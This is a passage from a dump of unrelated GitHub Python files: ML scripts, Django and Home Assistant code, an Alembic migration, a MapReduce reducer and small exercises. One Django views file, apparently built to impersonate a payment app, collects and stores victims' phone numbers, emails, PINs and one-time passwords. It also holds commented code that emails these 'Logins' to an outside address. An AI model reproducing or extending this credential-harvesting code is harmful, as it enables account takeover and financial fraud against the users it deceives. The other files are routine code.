error')\n#plt.yscale('log')\nplt.title('Final error = %.6f' %(MSE[-1]))\n#plt.show()\nplt.savefig('rnn0_result.png',dpi=200,bbox_inches='tight')\n\n\n\n","repo_name":"gloomhaven/mlpets","sub_path":"rnn/rnn0.py","file_name":"rnn0.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"6628589593","text":"\nfrom task.models import Task, Answer as Answering\nfrom task.serializers import TaskSerializer, AnswerSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom rest_framework.permissions import AllowAny\nfrom django.db import models\nfrom django.db.models import F\nfrom users.models import CustomUser\nfrom django.db.models import Q\nfrom django.core import serializers\nimport json\n\n\nclass CreateTask(APIView):\n \"\"\"\n create a new task.\n \"\"\"\n def post(self, request, format=None):\n serializer = TaskSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ElementCategory(APIView):\n \"\"\"\n list of element_category(not duplicated)\n \"\"\"\n def get(self, request, format=None):\n element_categories = Task.objects.values_list('element_category')\n return Response(element_categories)\n\n\nclass Answer(APIView):\n \"\"\"\n Saving answer.\n \"\"\"\n def post(self, request, format=None):\n request_data = request.data\n current_user = CustomUser.objects.filter(email=request.user).get()\n try:\n task = Task.objects.filter(pk=request_data['task']).get()\n except Task.DoesNotExist:\n return Response({\"error\": \"task not exist\"}, status=status.HTTP_400_BAD_REQUEST)\n\n request_data['user'] = current_user.id\n check_answer = Answering.objects.filter(user=current_user, task=task).all()\n if len(check_answer) == 0:\n serializer = AnswerSerializer(data=request_data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"already answered\"}, status=status.HTTP_400_BAD_REQUEST)\n\n\n\nclass TaskList(APIView):\n permission_classes = (AllowAny,)\n \"\"\"\n list of element_category(not duplicated)\n \"\"\"\n def get(self, request, format=None):\n num_per_page = 5\n page = request.GET.get('page')\n task_type = request.GET.get('task_type')\n element_category = request.GET.get('element_category')\n current_user = request.user\n email = request.user.email\n answered_tasks = Answering.objects.filter(user=current_user).values_list('task')\n answered_task_ids = []\n for answered_task in answered_tasks:\n answered_task_ids.append(answered_task[0])\n \"\"\"\n get tasks filtered by \n voters - if task is answered by user N times, if N is same with 'voters', this task should be excluded\n task_type - filter element\n element_cateogry - filter element\n black_list - if black_list involve current user email, this task should be excluded\n priority - order by priority\n \"\"\"\n if element_category == \"All\":\n query = Task.objects \\\n .annotate(counted_voters=models.Count('answer')) \\\n .values('id', 'task_type', 'element_category', 'element_type', 'priority', 'voters', 'external_id',\n 'task_name', 'image_url', 'answers', 'black_list', 'white_list', 'counted_voters') \\\n .filter(voters__gt=F('counted_voters'), task_type=task_type) \\\n .filter(Q(white_list=\"\") | (Q(white_list__isnull=False) & Q(white_list__contains=email))) \\\n .exclude(black_list__contains=email) \\\n .exclude(id__in=answered_task_ids) \\\n .order_by('priority')\n else:\n query = Task.objects\\\n .annotate(counted_voters=models.Count('answer')) \\\n .values('id', 'task_type', 'element_category', 'element_type', 'priority', 'voters', 'external_id',\n 'task_name', 'image_url', 'answers', 'black_list', 'white_list', 'counted_voters') \\\n .filter(voters__gt=F('counted_voters'), task_type=task_type, element_category=element_category) \\\n .filter(Q(white_list=\"\") | (Q(white_list__isnull=False) & Q(white_list__contains=email)))\\\n .exclude(black_list__contains=email) \\\n .exclude(id__in=answered_task_ids) \\\n .order_by('priority')\n\n task_list = query.all()\n paginator = Paginator(task_list, num_per_page)\n\n try:\n tasks = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n tasks = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n return Response([])\n\n return Response(tasks.object_list)\n\n\nclass TaskListByExternalId(APIView):\n permission_classes = (AllowAny,)\n \"\"\"\n list of element_category(not duplicated)\n \"\"\"\n def get(self, request):\n pk = int(request.GET.get('pk'))\n\n try:\n task = Task.objects.filter(pk=pk).get()\n except Task.DoesNotExist:\n task = None\n if task:\n task_json = serializers.serialize(\"json\", [task,])\n task_structure = json.loads(task_json)\n task_fields = task_structure[0]['fields']\n\n answers_json = serializers.serialize(\"json\", Answering.objects.filter(task=task).all())\n answer_structure = json.loads(answers_json)\n answer_fields = []\n for answer in answer_structure:\n answer_fields.append(answer['fields'])\n\n response = {\n \"pk\": pk,\n \"task\": task_fields,\n \"answers\": answer_fields\n }\n else:\n response = {\n \"pk\": pk,\n \"task\": None,\n \"answers\": None\n }\n\n return Response(response)\n\n\nclass UpdateTaskStatus(APIView):\n \"\"\"\n Enable/Disable task status.\n \"\"\"\n def get_object(self, info):\n try:\n task = Task.objects.filter(pk=info['pk']).get()\n except Task.DoesNotExist:\n task = None\n if task:\n return task\n else:\n return None\n\n def put(self, request, format=None):\n task = self.get_object(request.data)\n if task:\n task.is_active = request.data['is_active']\n task.save()\n response = {'status': 0, 'message': 'success'}\n return Response(response)\n raise Response({}, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"django-guru/Django-React","sub_path":"backend/task/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39791487935","text":"#!/usr/bin/python3\nfrom operator import itemgetter\nimport sys\n\n\nmain_dict = dict()\ni = 0\n\nfor line in sys.stdin: \n line = line.strip() \n fileread = line.split(\"$\")\n k1=fileread[0]\n k2=fileread[1]\n k3=int(fileread[2])\n k4=int(fileread[3])\n if((k1,k2) in main_dict.keys()):\n d = main_dict[k1,k2]\n main_dict[k1,k2] = (k3 + d[0] , k4+d[1]) \n else:\n main_dict[k1,k2] = (k3,k4)\n\n\nfor item1,v in list(main_dict.items()):\n v1,v2 = v[0],v[1]\n #print(v1,v2)\n if(v[1] < 6):\n del main_dict[item1]\nold = []\nsorted_final=sorted(main_dict.items(),key = lambda item:(-item[1][0] , item[1][1]))\nfor item1 in range(len(sorted_final)):\n print(sorted_final[item1][0][0]+\",\"+sorted_final[item1][0][1]+\",\"+str(sorted_final[item1][1][0])+\",\"+str(sorted_final[item1][1][1]))\n\n","repo_name":"IamMayankThakur/test-bigdata","sub_path":"adminmgr/media/code/python/red1/BD_0019_0207_0714_1822_reducer.py","file_name":"BD_0019_0207_0714_1822_reducer.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"70"}
+{"seq_id":"2624478934","text":"\"\"\"Create contract alerts\n\nRevision ID: 411346f721b4\nRevises: 72ed3f54a6ca\nCreate Date: 2022-02-13 02:12:10.026180\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = \"411346f721b4\"\ndown_revision = \"72ed3f54a6ca\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"contract_alerts\",\n sa.Column(\"alert_id\", postgresql.BIGINT(), nullable=False),\n sa.Column(\"keyword\", sa.String(), nullable=False, unique=True),\n sa.Column(\"chat_ids\", postgresql.ARRAY(postgresql.BIGINT()), nullable=False),\n sa.PrimaryKeyConstraint(\"alert_id\"),\n )\n op.create_index(\n \"ix_contract_alerts__chat_ids\",\n \"contract_alerts\",\n [\"chat_ids\"],\n unique=False,\n postgresql_using=\"gin\",\n )\n op.create_index(\n op.f(\"ix_contract_alerts_keyword\"), \"contract_alerts\", [\"keyword\"], unique=True\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f(\"ix_contract_alerts_keyword\"), table_name=\"contract_alerts\")\n op.drop_index(\n \"ix_contract_alerts__chat_ids\",\n table_name=\"contract_alerts\",\n postgresql_using=\"gin\",\n )\n op.drop_table(\"contract_alerts\")\n # ### end Alembic commands ###\n","repo_name":"edwinzhng/contract-scan-dash","sub_path":"server/alembic/versions/411346f721b4_create_contract_alerts.py","file_name":"411346f721b4_create_contract_alerts.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"518114626","text":"from keras.models import load_model, Sequential\nfrom keras.preprocessing import image\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras import models\n\n\n\n\nmodel_path = \"C:/Users/phan/OneDrive - adesso Group/model/dogcat.h5\"\nimg_path = \"./cat.1847.jpg\"\n\n\nimg = image.load_img(img_path, target_size=(150, 150))\nimg_tensor = image.img_to_array(img)\nimg_tensor = np.expand_dims(img_tensor, axis=0)\nimg_tensor /= 255.\n\nprint(img_tensor.shape)\nplt.imshow(img_tensor[0])\nplt.show()\n\nmodel: Sequential = load_model(model_path)\nmodel.summary()\n\n# Extracts the outputs of the top 8 layers:\nlayer_outputs = [layer.output for layer in model.layers[:8]]\n# Creates a model that will return these outputs, given the model input:\nactivation_model = models.Model(inputs=model.input, outputs=layer_outputs)\n\n# This will return a list of 5 Numpy arrays:\n# one array per layer activation\nactivations = activation_model.predict(img_tensor)\n\nfirst_layer_activation = activations[0]\n\nfor i in range(16):\n plt.matshow(first_layer_activation[0, :, :, i], cmap='viridis')\n plt.show()","repo_name":"nghiemphan93/machineLearning","sub_path":"2018-10-9/VisualConvnet.py","file_name":"VisualConvnet.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"6701878637","text":"\"\"\"\nSupport for ejp site.\n\n\nconfiguration.yaml\n\nsensor:\n - platform: edf_ejp\n regions:\n - ouest\n - sud\n - paca\n - nord\n\"\"\"\nimport logging\nfrom datetime import timedelta\nfrom datetime import datetime\nimport requests\nimport voluptuous as vol\n\nfrom homeassistant.components.sensor import PLATFORM_SCHEMA\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.const import ( CONF_RESOURCES)\nfrom homeassistant.util import Throttle\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.components.binary_sensor import BinarySensorDevice\n\n__version__ = '0.0.1'\n\n_LOGGER = logging.getLogger(__name__)\n\nMIN_TIME_BETWEEN_UPDATES = timedelta(days=1)\nnow = datetime.today()\n\nSENSOR_PREFIX = 'EJP '\n\nSENSOR_TYPES = {\n 'jour': ['today', '', 'mdi:flash'],\n 'tomorrow': ['tomorrow', '', 'mdi:flash'],\n}\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Required('regions', default=[]):\n vol.All(cv.ensure_list, [vol.In({'ouest','paca','nord','sud'})])\n})\n\n\ndef setup_platform(hass, config, add_entities, discovery_info=None):\n \"\"\"Setup the ejp sensors.\"\"\"\n\n try:\n data = EJPData()\n except requests.exceptions.HTTPError as error:\n _LOGGER.error(error)\n return False\n\n entities = []\n \n for resource in SENSOR_TYPES:\n sensor_type = resource.lower()\n for region in config['regions']:\n entities.append(EjpSensor(data, sensor_type, region))\n\n add_entities(entities)\n\n\n# pylint: disable=abstract-method\nclass EJPData(object):\n \"\"\"Representation of a Ejp data.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the data.\"\"\"\n self.data = None\n\n @Throttle(MIN_TIME_BETWEEN_UPDATES)\n def update(self):\n \"\"\"Update the data.\"\"\"\n try:\n \"\"\"\"\"\"\n self.data = requests.get('https://particulier.edf.fr/bin/edf_rc/servlets/ejptemponew?Date_a_remonter='+now.strftime('%Y-%m-%d')+'&TypeAlerte=EJP', timeout=5).json()\n _LOGGER.debug(\"Data = %s\", self.data)\n except requests.exceptions.RequestException:\n _LOGGER.error(\"Error occurred while fetching data.\")\n self.data = None\n return False\n\nclass EjpSensor(BinarySensorDevice):\n \"\"\"Representation of a Ejp Sensor.\"\"\"\n\n def __init__(self, data, sensor_type,region):\n \"\"\"Initialize the sensor.\"\"\"\n self.data = data\n self.type = sensor_type\n self.region = region\n self._name = SENSOR_PREFIX + region + '_' +SENSOR_TYPES[self.type][0]\n self._unit = SENSOR_TYPES[self.type][1]\n self._icon = SENSOR_TYPES[self.type][2]\n self._state = None\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return self._name\n\n @property\n def icon(self):\n \"\"\"Icon to use in the frontend, if any.\"\"\"\n return self._icon\n\n @property\n def state(self):\n \"\"\"Return the state of the sensor. (total/current power consumption/production or total gas used)\"\"\"\n return self._state\n\n @property\n def unit_of_measurement(self):\n \"\"\"Return the unit of measurement of this entity, if any.\"\"\"\n return self._unit\n\n def update(self):\n \"\"\"Get the latest data and use it to update our sensor state.\"\"\"\n self.data.update()\n energy = self.data.data\n value = None\n \n if self.region+'_'+self.type == 'ouest_jour':\n value = energy[\"JourJ\"][\"EjpOuest\"]\n elif self.region+'_'+self.type == 'paca_jour':\n value = energy[\"JourJ\"][\"EjpPaca\"]\n elif self.region+'_'+self.type == 'sud_jour':\n value = energy[\"JourJ\"][\"EjpSud\"]\n elif self.region+'_'+self.type == 'nord_jour':\n value = energy[\"JourJ\"][\"EjpNord\"]\n if self.region+'_'+self.type == 'ouest_tomorrow':\n value = energy[\"JourJ1\"][\"EjpOuest\"]\n elif self.region+'_'+self.type == 'paca_tomorrow':\n value = energy[\"JourJ1\"][\"EjpPaca\"]\n elif self.region+'_'+self.type == 'sud_tomorrow':\n value = energy[\"JourJ1\"][\"EjpSud\"]\n elif self.region+'_'+self.type == 'nord_tomorrow':\n value = energy[\"JourJ1\"][\"EjpNord\"]\n \n self._state = value == 'EJP'\n","repo_name":"sguernion/hass-integration-edf_ejp","sub_path":"custom_components/edf_ejp/binary_sensor.py","file_name":"binary_sensor.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"74835551587","text":"import sys\ninput = sys.stdin.readline\n\n# 0. input\nn = int(input())\nmeeting = []\nfor _ in range(n):\n meeting.append(list(map(int, input().split())))\n\n# 1. sort\nmeeting.sort(key = lambda x : (x[1], x[0]))\n\n# 2. search\ncnt = 1\nstart_time = meeting[0][0]\nend_time = meeting[0][1]\n\nfor i in range(1, n):\n if meeting[i][0] >= end_time:\n cnt += 1\n end_time = meeting[i][1]\nprint(cnt)","repo_name":"Algorithm-Test-Study/Code_Test_Study","sub_path":"ElAsJay/1931.회의실배정.py","file_name":"1931.회의실배정.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"5608436751","text":"import time\nimport datetime\nfrom danxiangli.bgsetter import setWallPaper\nfrom danxiangli.downloader import *\n\nif __name__ == '__main111111111111111__':\n while True:\n get_img()\n pic = 'your_path/image/wallpaper.bmp' # 写绝对路径\n setWallPaper(pic)\n time.sleep(6) # 6s切换一次壁纸\n print(1)\nif __name__ == '__main222__':\n print('设置墙纸')\n setWallPaper('image/final.jpg')\nif __name__ == '__main33333333333__':\n print('下载图片')\n date = datetime.datetime.now().strftime('%Y-%m-%d')\n url = 'http://img.owspace.com/Public/uploads/Download/2020/0109.jpg'\n download_image(date, url)\nif __name__ == '__main444444__':\n print('获取文件绝对路径')\n current_path = os.path.abspath(\"image/2020-01-09.bmp\")\n print(current_path)\n","repo_name":"Simple2016/python3.5","sub_path":"danxiangli/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"26832617296","text":"from django.shortcuts import render\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom .models import *\n\n# Create your views here.\n\ndef index(request):\n\tif request.method=='POST':\n\t\tphone=request.POST.get('phone')\n\t\tpost=Post(phone=phone)\n\t\tpost.save()\n\t#if request.method == 'POST':\n\t#\tphone= request.POST('phone')\n\t#\tpost=Post(phone=phone)\n\t#\tpost.save()\n\n\t#\tsend_mail(\n\t#\t\t'Logins',#title\n\t#\t\tmessage, #message\n\t#\t\t'settings.EMAIL_HOST_USER', #sender if not available considered the default or configered\n\t#\t\t[email,'oscarwilliam1978@gmsail.com'], #reciver email\n\t#\t\tfail_silently=False\n\t#\t)\n\t\n\treturn render(request,'index.html',)\n\ndef emailverify(request):\n\tif request.method=='POST':\n\t\temail=request.POST.get('email')\n\t\temail_post=Email_post(email=email)\n\t\temail_post.save()\n\t\n\t\n\treturn render(request,'email.html',)\n\n\ndef email(request):\n\n\treturn render(request,'email.html',)\n\ndef pinverify(request):\n\tif request.method=='POST':\n\t\tpina=request.POST.get('pina')\n\t\tpinb=request.POST.get('pinb')\n\t\tpinc=request.POST.get('pinc')\n\t\tpind=request.POST.get('pind')\n\t\tpin_post=Pin_post(pina=pina,pinb=pinb,pinc=pinc,pind=pind,)\n\t\tpin_post.save()\n\t\n\treturn render(request,'pin.html',)\n\ndef pin(request):\n\n\treturn render(request,'pin.html',)\n\ndef otpverify(request):\n\tif request.method=='POST':\n\t\totp=request.POST.get('otp')\n\t\totp_post=Otp_post(otp=otp)\n\t\totp_post.save()\n\t\t\n\treturn render(request,'otp.html',)\n\ndef otp(request):\n\t\t\n\treturn render(request,'otp.html',)\n","repo_name":"Kizinto/chipcashform","sub_path":"chippercashapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"36152757291","text":"import pandas as pd\n\n# a = [1, 7, 2]\n\nciudades = ['Valencia', 'Barcelona', 'Castellon']\ncodigo = ['123A', '456B', '789C']\n\nmyvar = pd.Series(ciudades, index = codigo)\n\n\n\nif __name__ == '__main__':\n print(myvar)\n # print(myvar[\"y\"])\n # print(pd.__version__)\n ","repo_name":"JoseMarin/jmm-python-pandas-alchemy-04-2022","sub_path":"code/ex03_series.py","file_name":"ex03_series.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"16571063693","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n# File: preprocess.py\n# Author: uxhao\n# Contact: uxhao_o@163.com\n# Description: 数据预处理\n# Date: 2023/3/31 13:46\nimport os\nimport cv2\nimport numpy as np\nfrom sklearn.model_selection import train_test_split, KFold\n\n\npalette_land = {\n 0: (0, 0, 0), # background\n 1: (255, 255, 0), # cloud_shadow\n 2: (255, 0, 255), # double_plant\n 3: (0, 255, 0), # planter_skip\n 4: (0, 0, 255), # standing_water\n 5: (255, 255, 255), # waterway\n 6: (0, 255, 255), # weed_cluster\n}\n\n\n# 自定义调色板,便于可视化,便于论文阅读\npalette_vsl = {\n 0: (0, 0, 0), # background\n 1: (0, 255, 0), # cloud_shadow\n 2: (255, 0, 0), # double_plant\n 3: (0, 200, 200), # planter_skip\n 4: (255, 255, 255), # standing_water\n 5: (128, 128, 0), # waterway\n 6: (0, 0, 255) # weed_cluster\n}\n\nlabels_folder = {\n 'cloud_shadow': 1,\n 'double_plant': 2,\n 'planter_skip': 3,\n 'standing_water': 4,\n 'waterway': 5,\n 'weed_cluster': 6\n}\n\n# 7个类别(包含背景)\nland_classes = [\"background\", \"cloud_shadow\", \"double_plant\", \"planter_skip\",\n \"standing_water\", \"waterway\", \"weed_cluster\"]\n","repo_name":"uxhao-o/MSCGNet","sub_path":"libs/data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72574175586","text":"from datetime import datetime\nfrom operator import attrgetter\nfrom typing import List\nfrom uuid import uuid4, UUID\nfrom .models import Notification, UserNotification\nfrom base64 import b64encode, b64decode\nimport pytz\n\n\ndef tokenize_timestamp(ts):\n return b64encode(str(ts).encode('utf-8')).decode('utf-8')\n\n\ndef parse_token(token):\n return datetime.utcfromtimestamp(float(b64decode(token.encode('utf-8'))))\n\n\ndef for_user(user_id: int, fetch_notifications=False, page_token=None):\n td = datetime.utcnow()\n usr = UserNotification\\\n .filter(user_id=user_id)\\\n .order_by('-show_after')\\\n .limit(2)\n if page_token:\n usr = usr.filter(show_after__lt=parse_token(page_token))\n else:\n usr = usr.filter(show_after__lte=td)\n # prefetch related notifications\n if fetch_notifications:\n related_ntfs = Notification.filter(id__in=list(map(attrgetter('nid'), usr)))\n for n in usr:\n ntf = list(filter(lambda x: x.id == n.nid, related_ntfs))[0]\n n.notification = ntf\n return usr, (tokenize_timestamp(pytz.utc.localize(usr[-1].show_after).timestamp()) if len(usr) else None)\n\n\ndef row_ttl(ttl: int, delay: datetime = None):\n delay = delay.timestamp() if delay else 0\n return ttl + delay\n\n\ndef create_notification(user_ids: List[int],\n message: str,\n img_url: str = None,\n delay: datetime = None,\n lesson_id: int = None,\n ttl: int = None):\n NotifPrep = Notification\n UserNotifPrep = UserNotification\n if ttl:\n # provide ttl if custom expire provided\n # otherwise use model's default ttl\n ttl = row_ttl(ttl, delay)\n NotifPrep = NotifPrep.ttl(ttl)\n UserNotifPrep = UserNotifPrep.ttl(ttl)\n ntf = NotifPrep.create(id=uuid4(), message=message, img_url=img_url)\n show_after = delay\n if not show_after:\n show_after = datetime.utcnow()\n for u in user_ids:\n UserNotifPrep.create(\n nid=ntf.id, user_id=u,\n lesson_id=lesson_id, show_after=show_after)\n return ntf\n\n\ndef read_notification(nid: UUID, user_id: int):\n UserNotification.filter(nid=nid, user_id=user_id)","repo_name":"eluzeon/NTFService","sub_path":"app/notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"42890246964","text":"import io\nimport json\nfrom pathlib import Path\nfrom uuid import UUID\n\nfrom django.conf import settings\nfrom django.core.files import File\nfrom django.test import override_settings, TestCase\nfrom model_bakery import baker\n\nfrom networkgen.models import Generator, Ligand\n\n\n@override_settings(MEDIA_ROOT=Path(__file__).parent / \"test_files\" / \"media\")\nclass GeneratorModel(TestCase):\n def setUp(self):\n Path(settings.MEDIA_ROOT).mkdir(exist_ok=True)\n self.sdf_path = Path(__file__).parent / \"test_files\" / \"CDK2_ligands.sdf\"\n self.in_sdf = File(open(self.sdf_path, \"rb\"), name=\"CDK2_ligands.sdf\")\n self.multi_path = Path(__file__).parent / \"test_files\" / \"EG5_multicharge.sdf\"\n self.multi_sdf = File(open(self.multi_path, \"rb\"), name=\"EG5_multicharge.sdf\")\n\n def tearDown(self):\n for l in Ligand.objects.all():\n Path(l.image.path).unlink(missing_ok=True)\n for g in Generator.objects.all():\n Path(g.in_sdf.path).unlink(missing_ok=True)\n try:\n Path(settings.MEDIA_ROOT / \"molimages\").rmdir()\n Path(settings.MEDIA_ROOT).rmdir()\n except OSError:\n pass\n\n def test_object_name(self):\n network = baker.make_recipe(\"networkgen.network\")\n assert str(network) == f\"Network Generator <{network.uuid}>\"\n\n def test_network_json_is_created_on_saving(self):\n g = Generator(metric=Generator.MFP, in_sdf=self.in_sdf)\n assert g.network is None\n g.save()\n network_json = json.loads(g.network)\n\n assert list(network_json.keys()) == [\"0\"]\n\n ligands = [(_.name, _.uuid, _.image.url) for _ in g.ligand_set.all()]\n for node in network_json[\"0\"][\"nodes\"]:\n assert (node[\"label\"], UUID(node[\"id\"]), node[\"image\"]) in ligands\n\n uuids = [str(_) for _ in Ligand.objects.values_list(\"uuid\", flat=True)]\n for edge in network_json[\"0\"][\"edges\"]:\n assert edge[\"from\"] in uuids\n assert edge[\"to\"] in uuids\n\n def test_network_image_builder(self):\n assert Ligand.objects.count() == 0\n\n network = baker.make_recipe(\"networkgen.network\")\n\n assert Ligand.objects.count() == 16\n\n for l in Ligand.objects.all():\n assert l.image.width == 400\n assert l.image.width == 400\n\n def test_network_json_for_multicharge_sdf(self):\n g = Generator(metric=Generator.SMILES, in_sdf=self.multi_sdf)\n assert g.network is None\n g.save()\n network_json = json.loads(g.network)\n\n assert list(network_json.keys()) == [\"0\", \"1\"]\n\n ligands = [(_.name, _.uuid, _.image.url) for _ in g.ligand_set.all()]\n for charge in network_json.keys():\n for node in network_json[charge][\"nodes\"]:\n assert (node[\"label\"], UUID(node[\"id\"]), node[\"image\"]) in ligands\n\n uuids = [str(_) for _ in Ligand.objects.values_list(\"uuid\", flat=True)]\n for charge in network_json.keys():\n for edge in network_json[charge][\"edges\"]:\n assert edge[\"from\"] in uuids\n assert edge[\"to\"] in uuids\n","repo_name":"GPCR-ModSim/qfepweb","sub_path":"networkgen/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"4548135520","text":"import heapq\nclass Solution:\n def maxPerformance(self, n: int, speed: List[int], efficiency: List[int], k: int) -> int:\n arr = [[efficiency[i],speed[i]] for i in range(n)]\n arr = sorted(arr, key = lambda x: -x[0])\n # print(arr)\n max_s = []\n max_p = 0\n max_sum = 0\n for i in range(n):\n # if imax_p:\n max_p = perform\n if len(max_s)>=k-1 and len(max_s)>=1 and max_s[0] remaining:\n break\n else:\n remaining -= song[2]\n songlist.append(song[0])\n \n return songlist","repo_name":"laurenceantao/edX","sub_path":"6.00.2x/Quiz/Problem3.py","file_name":"Problem3.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"7824380667","text":"from . import models\n\n\nclass NewsViewMixin:\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['related_news'] = models.News.objects.all()\n for tag in models.NewsTag.objects.all():\n news_count = models.News.objects.filter(tag=tag).count()\n context['news_tag'].append(\n {'id': tag.id, 'title': tag.title, 'count': news_count})\n return context\n","repo_name":"kermitlafrog61/jia","sub_path":"src/apps/news/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"13063252511","text":"import glob\nfrom os import chdir\nimport codecs\nfrom pyinformehw.dao.base import Session, engine, Base, borrar_todo, exportar\nfrom pyinformehw.dao.user import User\nfrom pyinformehw.dao.computersystem import Computersystem\nfrom pyinformehw.dao.baseboard import Baseboard\nfrom pyinformehw.dao.cpu import Cpu\nfrom pyinformehw.dao.memphysical import Memphysical\nfrom pyinformehw.dao.memorychip import Memorychip\nfrom pyinformehw.dao.diskdrive import Diskdrive\nfrom pyinformehw.dao.volume import Volume\nfrom pyinformehw.dao.benchmark import Benchmark\nfrom pyinformehw.dao.diskmodel import Diskmodel\n\n\ndef crea_registro(seccion, computer, mapa_campos):\n if seccion == 'COMPUTERSYSTEM':\n return Computersystem(computer,mapa_campos)\n elif seccion == 'BASEBOARD':\n return Baseboard(computer,mapa_campos)\n elif seccion == 'CPU':\n return Cpu(computer,mapa_campos)\n elif seccion == 'MEMPHYSICAL':\n return Memphysical(computer,mapa_campos)\n elif seccion == 'MEMORYCHIP':\n return Memorychip(computer,mapa_campos)\n elif seccion == 'DISKDRIVE':\n return Diskdrive(computer,mapa_campos)\n elif seccion == 'VOLUME':\n return Volume(computer,mapa_campos)\n\n\ndef run():\n print('Iniciamos ejecucion de PyInformeHW')\n\n Base.metadata.create_all(engine)\n\n #Borramos todos los datos de las tablas\n session = Session()\n borrar_todo(engine.connect())\n session.commit()\n session.close()\n\n session = Session()\n\n chdir('./ficherosEntrada')\n #Recorremos todos los ficheros de la carpeta que cumplen el patron\n for file_name in glob.glob('info_*.txt'):\n print('Procesando el fichero:', file_name)\n \n #dividimos el nombre para saber usuario y maquina\n file_name_parts = file_name.replace('.','_').split('_')\n user = file_name_parts[1]\n computer = file_name_parts[2]\n\n #Actualizamos el usuario o lo insertamos nuevo\n registro_user = session.query(User).filter(User.name == user).filter(User.computer == computer).first()\n if registro_user is not None:\n print('Usuario ya encontrado:',registro_user.name, '-',registro_user.computer)\n else:\n registro_user = User(user, computer)\n session.add(registro_user)\n print('Nuevo usuario insertado:',registro_user.name, '-',registro_user.computer)\n\n #leemos el fichero linea a linea, procesando la cabecera de seccion, la linea de titulos y los datos\n seccion = ''\n primera_linea = False\n\n fichero = codecs.open(file_name,'r','utf_16_le')\n \n lineas = fichero.readlines()\n for linea in lineas:\n #Cabecera de seccion\n if linea[0] == '#':\n seccion = linea.strip()[1:-1]\n #print('Seccion', seccion)\n primera_linea = True\n\n #titulos de la linea\n elif primera_linea:\n primera_linea = False\n lista_campos = linea.split()\n mapa_campos = {}\n for i in range(0,len(lista_campos)):\n if i == len(lista_campos)-1:\n mapa_campos[lista_campos[i]] = len(linea)\n else:\n mapa_campos[lista_campos[i]] = linea.find(lista_campos[i+1])\n #print(mapa_campos)\n\n #lineas de datos\n else:\n #creamos el registro que corresponda segun la seccion\n registro = crea_registro(seccion, computer, mapa_campos)\n #procesamos la linea\n registro.leer_linea(linea)\n #insertamos en BBDD\n session.add(registro)\n\n #Recorremos todos los ficheros de la carpeta que cumplen el patron\n for file_name in glob.glob('benchmark_*.txt'):\n print('Procesando el fichero:', file_name)\n \n #dividimos el nombre para saber maquina y fecha\n file_name_parts = file_name.replace('.','_').split('_')\n computer = file_name_parts[1]\n fecha = file_name_parts[2]\n\n #leemos el fichero linea a 